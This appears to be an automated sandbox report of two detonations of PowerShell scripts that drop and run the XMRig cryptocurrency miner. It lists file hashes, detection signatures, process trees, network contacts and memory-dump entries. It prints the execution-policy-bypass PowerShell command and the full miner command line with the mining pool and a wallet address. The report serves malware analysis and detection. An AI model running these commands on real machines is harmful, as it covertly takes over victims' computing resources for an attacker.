MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral13

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:34

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1778s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mjynz3hr.edm.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral18

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:39

Platform

win10-20240404-en

Max time kernel

1796s

Max time network

1751s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 52.111.227.14:443 tcp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 67.112.168.52.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp

Files

memory/2676-3-0x00007FFA5ED73000-0x00007FFA5ED74000-memory.dmp

memory/2676-5-0x000001AB53080000-0x000001AB530A2000-memory.dmp

memory/2676-8-0x00007FFA5ED70000-0x00007FFA5F75C000-memory.dmp

memory/2676-9-0x000001AB53240000-0x000001AB532B6000-memory.dmp

memory/2676-10-0x00007FFA5ED70000-0x00007FFA5F75C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s0rce1wr.5nm.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/2676-25-0x00007FFA5ED70000-0x00007FFA5F75C000-memory.dmp

memory/2676-48-0x000001AB536F0000-0x000001AB53702000-memory.dmp

memory/2676-61-0x000001AB53230000-0x000001AB5323A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2952-90-0x000002802E580000-0x000002802E5A0000-memory.dmp

memory/2952-91-0x00007FF63C0C0000-0x00007FF63CCF3000-memory.dmp

memory/2676-92-0x00007FFA5ED70000-0x00007FFA5F75C000-memory.dmp

memory/2676-94-0x00007FFA5ED73000-0x00007FFA5ED74000-memory.dmp

memory/2952-93-0x00007FF63C0C0000-0x00007FF63CCF3000-memory.dmp

memory/2676-95-0x00007FFA5ED70000-0x00007FFA5F75C000-memory.dmp

memory/2952-96-0x00007FF63C0C0000-0x00007FF63CCF3000-memory.dmp

memory/2952-97-0x00007FF63C0C0000-0x00007FF63CCF3000-memory.dmp

memory/2952-98-0x00007FF63C0C0000-0x00007FF63CCF3000-memory.dmp

memory/2952-99-0x00007FF63C0C0000-0x00007FF63CCF3000-memory.dmp

memory/2952-100-0x00007FF63C0C0000-0x00007FF63CCF3000-memory.dmp

memory/2952-101-0x00007FF63C0C0000-0x00007FF63CCF3000-memory.dmp

memory/2952-102-0x00007FF63C0C0000-0x00007FF63CCF3000-memory.dmp

memory/2952-103-0x00007FF63C0C0000-0x00007FF63CCF3000-memory.dmp

memory/2952-104-0x00007FF63C0C0000-0x00007FF63CCF3000-memory.dmp

memory/2952-105-0x00007FF63C0C0000-0x00007FF63CCF3000-memory.dmp

memory/2952-106-0x00007FF63C0C0000-0x00007FF63CCF3000-memory.dmp

memory/2952-107-0x00007FF63C0C0000-0x00007FF63CCF3000-memory.dmp

memory/2952-108-0x00007FF63C0C0000-0x00007FF63CCF3000-memory.dmp

memory/2952-109-0x00007FF63C0C0000-0x00007FF63CCF3000-memory.dmp

memory/2952-110-0x00007FF63C0C0000-0x00007FF63CCF3000-memory.dmp

memory/2952-111-0x00007FF63C0C0000-0x00007FF63CCF3000-memory.dmp

memory/2952-112-0x00007FF63C0C0000-0x00007FF63CCF3000-memory.dmp

memory/2952-113-0x00007FF63C0C0000-0x00007FF63CCF3000-memory.dmp

memory/2952-114-0x00007FF63C0C0000-0x00007FF63CCF3000-memory.dmp

memory/2952-115-0x00007FF63C0C0000-0x00007FF63CCF3000-memory.dmp

memory/2952-116-0x00007FF63C0C0000-0x00007FF63CCF3000-memory.dmp

memory/2952-117-0x00007FF63C0C0000-0x00007FF63CCF3000-memory.dmp

memory/2952-118-0x00007FF63C0C0000-0x00007FF63CCF3000-memory.dmp

memory/2952-119-0x00007FF63C0C0000-0x00007FF63CCF3000-memory.dmp

memory/2952-120-0x00007FF63C0C0000-0x00007FF63CCF3000-memory.dmp

memory/2952-121-0x00007FF63C0C0000-0x00007FF63CCF3000-memory.dmp

memory/2952-122-0x00007FF63C0C0000-0x00007FF63CCF3000-memory.dmp

memory/2952-123-0x00007FF63C0C0000-0x00007FF63CCF3000-memory.dmp

memory/2952-124-0x00007FF63C0C0000-0x00007FF63CCF3000-memory.dmp

memory/2952-125-0x00007FF63C0C0000-0x00007FF63CCF3000-memory.dmp

memory/2952-126-0x00007FF63C0C0000-0x00007FF63CCF3000-memory.dmp

memory/2952-127-0x00007FF63C0C0000-0x00007FF63CCF3000-memory.dmp

memory/2952-128-0x00007FF63C0C0000-0x00007FF63CCF3000-memory.dmp

memory/2952-129-0x00007FF63C0C0000-0x00007FF63CCF3000-memory.dmp

memory/2952-130-0x00007FF63C0C0000-0x00007FF63CCF3000-memory.dmp

memory/2952-131-0x00007FF63C0C0000-0x00007FF63CCF3000-memory.dmp

memory/2952-132-0x00007FF63C0C0000-0x00007FF63CCF3000-memory.dmp

memory/2952-133-0x00007FF63C0C0000-0x00007FF63CCF3000-memory.dmp

memory/2952-134-0x00007FF63C0C0000-0x00007FF63CCF3000-memory.dmp

memory/2952-135-0x00007FF63C0C0000-0x00007FF63CCF3000-memory.dmp

memory/2952-136-0x00007FF63C0C0000-0x00007FF63CCF3000-memory.dmp

memory/2952-137-0x00007FF63C0C0000-0x00007FF63CCF3000-memory.dmp

memory/2952-138-0x00007FF63C0C0000-0x00007FF63CCF3000-memory.dmp

memory/2952-139-0x00007FF63C0C0000-0x00007FF63CCF3000-memory.dmp

memory/2952-140-0x00007FF63C0C0000-0x00007FF63CCF3000-memory.dmp

memory/2952-141-0x00007FF63C0C0000-0x00007FF63CCF3000-memory.dmp

memory/2952-142-0x00007FF63C0C0000-0x00007FF63CCF3000-memory.dmp

memory/2952-143-0x00007FF63C0C0000-0x00007FF63CCF3000-memory.dmp

memory/2952-144-0x00007FF63C0C0000-0x00007FF63CCF3000-memory.dmp

memory/2952-145-0x00007FF63C0C0000-0x00007FF63CCF3000-memory.dmp

memory/2952-146-0x00007FF63C0C0000-0x00007FF63CCF3000-memory.dmp

memory/2952-147-0x00007FF63C0C0000-0x00007FF63CCF3000-memory.dmp

memory/2952-148-0x00007FF63C0C0000-0x00007FF63CCF3000-memory.dmp

memory/2952-149-0x00007FF63C0C0000-0x00007FF63CCF3000-memory.dmp

memory/2952-150-0x00007FF63C0C0000-0x00007FF63CCF3000-memory.dmp

memory/2952-151-0x00007FF63C0C0000-0x00007FF63CCF3000-memory.dmp

memory/2952-152-0x00007FF63C0C0000-0x00007FF63CCF3000-memory.dmp

memory/2952-153-0x00007FF63C0C0000-0x00007FF63CCF3000-memory.dmp

memory/2952-154-0x00007FF63C0C0000-0x00007FF63CCF3000-memory.dmp

memory/2952-155-0x00007FF63C0C0000-0x00007FF63CCF3000-memory.dmp

memory/2952-156-0x00007FF63C0C0000-0x00007FF63CCF3000-memory.dmp